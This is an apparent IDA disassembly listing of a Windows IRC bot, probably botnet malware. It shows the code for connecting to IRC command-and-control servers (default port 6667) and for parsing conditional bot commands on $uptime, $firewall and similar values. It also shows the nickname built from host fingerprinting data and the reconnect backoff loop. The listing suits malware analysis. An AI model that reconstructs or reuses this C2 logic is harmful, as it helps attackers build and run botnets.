loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EEC8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F048
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; ---------------------------------------------------------------------------
loc_40C93C: ; DATA XREF: sub_40CEB0+66�o
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push dword ptr [ebp+8]
lea eax, [ebp-534h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-208h]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp-530h]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp-204h], eax
and dword ptr [ebp-20Ch], 0
loc_40C98D: ; CODE XREF: .text:0040CA12�j
cmp dword ptr [ebp-204h], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: .text:0040C994�j
; .text:0040C9B5�j
mov eax, [ebp-204h]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: .text:0040C9A4�j
mov eax, [ebp-204h]
inc eax
mov [ebp-204h], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: .text:0040C9A6�j
push dword ptr [ebp-204h]
lea eax, [ebp-38Fh]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp-200h]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp-200h]
push eax
call sub_40E618
pop ecx
lea eax, [ebp-208h]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp-20Ch], eax
mov eax, [ebp-20Ch]
mov [ebp-204h], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: .text:0040C996�j
push dword ptr [ebp-534h]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B6h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B6h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEB0 proc near ; CODE XREF: sub_40A9CF+14CE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call sub_40CA29
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_40CEC9
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CEB0+15�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40CEDF
jmp short locret_40CF23
; ---------------------------------------------------------------------------
loc_40CEDF: ; CODE XREF: sub_40CEB0+2B�j
push 180h
push [ebp+var_8]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_8]
push offset aExecutingComma ; "Executing command(s): %s"
push 0
push [ebp+var_4]
push offset loc_40C93C
call sub_4095A4
add esp, 14h
locret_40CF23: ; CODE XREF: sub_40CEB0+17�j
; sub_40CEB0+2D�j
leave
retn
sub_40CEB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF25 proc near ; CODE XREF: .text:00402175�p
; sub_40D871+59B�p ...
push ebp
mov ebp, esp
mov eax, dword_41E9A4
pop ebp
retn
sub_40CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF2F proc near ; CODE XREF: sub_40D366+D�p
; sub_40D366+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
jz short loc_40CF9E
push [ebp+arg_0]
push offset dword_41E898
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
cmp [ebp+arg_4], 0
jz short loc_40CF60
push [ebp+arg_4]
push offset dword_41E998
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF71
; ---------------------------------------------------------------------------
loc_40CF60: ; CODE XREF: sub_40CF2F+1E�j
push offset a6667 ; "6667"
push offset dword_41E998
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF71: ; CODE XREF: sub_40CF2F+2F�j
cmp [ebp+arg_8], 0
jz short loc_40CF88
push [ebp+arg_8]
push offset byte_41E718
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40CF99
; ---------------------------------------------------------------------------
loc_40CF88: ; CODE XREF: sub_40CF2F+46�j
push offset byte_41DE30
push offset byte_41E718
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40CF99: ; CODE XREF: sub_40CF2F+57�j
jmp loc_40D020
; ---------------------------------------------------------------------------
loc_40CF9E: ; CODE XREF: sub_40CF2F+9�j
and [ebp+var_4], 0
jmp short loc_40CFAB
; ---------------------------------------------------------------------------
loc_40CFA4: ; CODE XREF: sub_40CF2F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40CFAB: ; CODE XREF: sub_40CF2F+73�j
mov eax, [ebp+var_4]
imul eax, 0Ch
cmp off_41DA68[eax], 0
jz short loc_40CFBC
jmp short loc_40CFA4
; ---------------------------------------------------------------------------
loc_40CFBC: ; CODE XREF: sub_40CF2F+89�j
call sub_410422
xor edx, edx
div [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA68[eax]
push offset dword_41E898
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA6C[eax]
push offset dword_41E998
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
cmp dword_41DA70[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push dword_41DA70[eax]
push offset byte_41E718
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E898
call sub_4105AD
pop ecx
push offset dword_41E998
call sub_4105AD
pop ecx
push offset byte_41E718
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, byte_41E718
test eax, eax
jz short loc_40D099
push offset byte_41E718
call sub_4105FB
pop ecx
push offset byte_41E718
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E718
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, byte_41EEC8
test eax, eax
jz short loc_40D0C3
push offset byte_41EEC8
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EEC8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, byte_41F048
test eax, eax
jz short loc_40D0F6
push offset byte_41F048
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F048
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, byte_41EE48
test eax, eax
jz short loc_40D163
push offset byte_41EE48
push offset aNickS ; "NICK %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA_0 ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, byte_41DB34
test eax, eax
jz short loc_40D31D
push offset byte_41DB34
push offset aLast ; "#last"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aLast ; "#last"
call sub_4105FB
pop ecx
movsx eax, byte_41DBB4
test eax, eax
jz short loc_40D31D
push offset byte_41DBB4
push offset dword_41ED48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41ED48
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DAA4
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset aNickS ; "NICK %s"
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EE48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push dword_41E9A4
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E898
call sub_4105FB
pop ecx
push offset dword_41E998
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41E998
push offset dword_41E898
call sub_4050EA
add esp, 10h
mov dword_41E9A4, eax
push offset dword_41E898
call sub_4105AD
pop ecx
push offset dword_41E998
call sub_4105AD
pop ecx
cmp dword_41E9A4, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call ds:dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: .text:004022A0�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: .text:004022DD�p
; .text:004034D1�p ...
var_1008 = dword ptr -1008h
